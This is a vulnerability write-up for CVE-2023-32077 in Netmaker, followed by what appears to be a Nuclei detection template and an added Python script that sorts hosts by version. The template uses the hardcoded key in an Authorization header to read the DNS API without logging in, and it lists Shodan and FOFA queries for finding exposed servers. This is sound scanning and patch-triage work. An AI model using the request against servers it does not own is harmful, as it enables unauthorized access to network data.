Vulnerability Description
Netmaker builds networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, Netmaker used a hardcoded DNS key, allowing unauthenticated users to interact with DNS API endpoints.
id: CVE-2023-32077

info:
  name: Netmaker - Hardcoded DNS Secret Key
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-32077
    cwe-id: CWE-798,CWE-321
    epss-score: 0.59995
    epss-percentile: 0.98215
    cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: gravitl
    product: netmaker
    shodan-query:
      - html:"netmaker"
      - http.html:"netmaker"
    fofa-query: body="netmaker"
  tags: cve,cve2023,info-key,netmaker,exposure,gravitl

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/dns"
    headers:
      Authorization: "x secretkey"
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")'
        condition: and
# digest: 4a0a00473045022031a0ffdfbde92f1da1075faf14e1bdfff00a6850bd8479b01c534dc493b97f6b02210095af26fd974a823f717b1e830f0b2825d7a43a2597f3a678695246ec433ee057:922c64590222798bb761d5b6d8e72950
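The description names two fixed releases, one per release line, so a plain "older than X" comparison misclassifies hosts on the other line. The following is an added example (not part of the template or of Netmaker) that triages an asset inventory against those two versions. It assumes that release lines newer than 0.18 carry the fix, that lines older than 0.17 do not, and that a pre-release of a fixed version is still affected; the hostnames and inventory are constructed.

```python
import re

# Fixed releases named in the advisory text, keyed by (major, minor) release line.
FIXED = {(0, 17): (0, 17, 1), (0, 18): (0, 18, 6)}

def parse_version(text):
    """Parse 'v0.18.5', '0.17.1' or '0.18.6-rc1' into ((major, minor, patch), is_prerelease)."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.-]+)?", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(m.group(i)) for i in (1, 2, 3)), m.group(4) is not None

def is_affected(version_text):
    """True if the version predates the fix for CVE-2023-32077 on its release line."""
    core, prerelease = parse_version(version_text)
    line = core[:2]
    if line in FIXED:
        fixed = FIXED[line]
        # Assumption: a pre-release of the fixed version sorts before it (conservative).
        return core < fixed or (core == fixed and prerelease)
    # Assumption: lines older than 0.17 were never patched; newer lines include the fix.
    return line < min(FIXED)

def triage(inventory):
    """Map each host to 'affected', 'patched' or 'unknown' (unparsable version)."""
    result = {}
    for host, version in inventory.items():
        try:
            result[host] = "affected" if is_affected(version) else "patched"
        except ValueError:
            result[host] = "unknown"
    return result

# Constructed sample inventory: hostname -> reported Netmaker version.
SAMPLE_INVENTORY = {
    "nm-lab-01.example": "v0.17.0",
    "nm-lab-02.example": "0.17.1",
    "nm-prod-01.example": "v0.18.5",
    "nm-prod-02.example": "0.18.6-rc1",
    "nm-edge-01.example": "0.19.0",
    "nm-edge-02.example": "latest",
}

if __name__ == "__main__":
    for host, status in sorted(triage(SAMPLE_INVENTORY).items()):
        print(f"{host:22} {SAMPLE_INVENTORY[host]:12} {status}")
```

Hosts reported as "unknown" need their version confirmed by hand before they can be ruled out.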